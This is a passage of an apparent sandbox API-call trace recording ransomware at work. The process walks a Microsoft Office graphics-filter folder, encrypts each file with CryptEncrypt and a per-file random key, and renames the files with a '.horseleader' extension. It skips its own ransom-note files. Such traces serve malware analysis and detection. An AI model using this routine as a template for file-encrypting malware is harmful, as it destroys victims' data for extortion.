dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.981] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.407] SetFilePointerEx 
(in: hFile=0x158, liDistanceToMove=0x547c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.407] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.552] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0227.552] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.552] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa8f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.552] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.554] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0227.554] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.555] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0227.555] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0227.555] CloseHandle (hObject=0x158) returned 1 [0227.556] GetProcessHeap () returned 0x780000 [0227.556] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0227.556] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.horseleader") returned 83 [0227.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.horseleader")) returned 1 [0227.557] GetProcessHeap () returned 0x780000 [0227.557] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0227.557] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x4e380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="GIFIMP32.FLT", cAlternateFileName="")) returned 1 [0227.557] lstrcmpiW (lpString1="GIFIMP32.FLT", lpString2="Windows") returned -1 [0227.557] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 71 [0227.557] StrStrIW (lpFirst="GIFIMP32.FLT", 
lpSrch=".horseleader") returned 0x0 [0227.557] lstrcmpW (lpString1="GIFIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0227.557] lstrcmpW (lpString1="GIFIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0227.557] lstrlenW (lpString=".testttjffg") returned 11 [0227.557] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0227.557] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0227.557] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0227.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0227.559] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 71 [0227.559] StrStrW (lpFirst="GIFIMP32.FLT", lpSrch=".txt") returned 0x0 [0227.559] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=320384) returned 1 [0227.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.559] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0227.996] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x249c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.996] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.008] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x49380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.013] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.025] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.025] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.026] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.026] CloseHandle (hObject=0x158) returned 1 [0228.026] GetProcessHeap () returned 0x780000 [0228.026] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.026] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.horseleader") returned 83 [0228.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.horseleader")) returned 1 [0228.028] GetProcessHeap () returned 0x780000 [0228.028] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.028] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x3ad80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="JPEGIM32.FLT", cAlternateFileName="")) returned 1 [0228.028] lstrcmpiW (lpString1="JPEGIM32.FLT", lpString2="Windows") returned -1 
[0228.028] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 71 [0228.028] StrStrIW (lpFirst="JPEGIM32.FLT", lpSrch=".horseleader") returned 0x0 [0228.028] lstrcmpW (lpString1="JPEGIM32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.028] lstrcmpW (lpString1="JPEGIM32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.028] lstrlenW (lpString=".testttjffg") returned 11 [0228.029] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.029] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.029] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 71 [0228.030] StrStrW (lpFirst="JPEGIM32.FLT", lpSrch=".txt") returned 0x0 [0228.030] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=241024) returned 1 [0228.030] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.031] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, 
lpOverlapped=0x0) returned 1 [0228.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.033] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1aec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.033] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.035] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x35d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.035] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.037] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.037] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, 
lpOverlapped=0x0) returned 1 [0228.037] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.037] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.037] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.038] CloseHandle (hObject=0x158) returned 1 [0228.038] GetProcessHeap () returned 0x780000 [0228.038] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.038] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.horseleader") returned 83 [0228.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.horseleader")) returned 1 [0228.039] GetProcessHeap () returned 0x780000 [0228.039] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.040] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, 
nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.CGM", cAlternateFileName="")) returned 1 [0228.040] lstrcmpiW (lpString1="MS.CGM", lpString2="Windows") returned -1 [0228.040] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 65 [0228.040] StrStrIW (lpFirst="MS.CGM", lpSrch=".horseleader") returned 0x0 [0228.040] lstrcmpW (lpString1="MS.CGM", lpString2="#Decrypt#.txt") returned 1 [0228.040] lstrcmpW (lpString1="MS.CGM", lpString2="_uninstalling_.png") returned 1 [0228.040] lstrlenW (lpString=".testttjffg") returned 11 [0228.040] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpSrch=".testttjffg") returned 0x0 [0228.040] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.040] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.045] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 65 [0228.045] StrStrW (lpFirst="MS.CGM", lpSrch=".txt") returned 0x0 [0228.045] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1908) returned 1 [0228.045] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x774, 
lpOverlapped=0x0) returned 1 [0228.071] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff88c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.071] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x774, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x774, lpOverlapped=0x0) returned 1 [0228.072] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.072] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.072] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.072] CloseHandle (hObject=0x158) returned 1 [0228.072] GetProcessHeap () returned 0x780000 [0228.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.072] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.horseleader") returned 77 [0228.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.horseleader")) returned 1 [0228.073] GetProcessHeap () returned 0x780000 [0228.073] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.073] 
FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.EPS", cAlternateFileName="")) returned 1 [0228.073] lstrcmpiW (lpString1="MS.EPS", lpString2="Windows") returned -1 [0228.073] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 65 [0228.073] StrStrIW (lpFirst="MS.EPS", lpSrch=".horseleader") returned 0x0 [0228.074] lstrcmpW (lpString1="MS.EPS", lpString2="#Decrypt#.txt") returned 1 [0228.074] lstrcmpW (lpString1="MS.EPS", lpString2="_uninstalling_.png") returned 1 [0228.074] lstrlenW (lpString=".testttjffg") returned 11 [0228.074] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpSrch=".testttjffg") returned 0x0 [0228.074] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.074] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 65 
[0228.075] StrStrW (lpFirst="MS.EPS", lpSrch=".txt") returned 0x0 [0228.075] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15067) returned 1 [0228.075] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3adb, lpOverlapped=0x0) returned 1 [0228.147] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc525, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.147] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3adb, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3adb, lpOverlapped=0x0) returned 1 [0228.148] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.148] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.148] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.148] CloseHandle (hObject=0x158) returned 1 [0228.148] GetProcessHeap () returned 0x780000 [0228.149] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.149] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.horseleader") returned 77 [0228.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft 
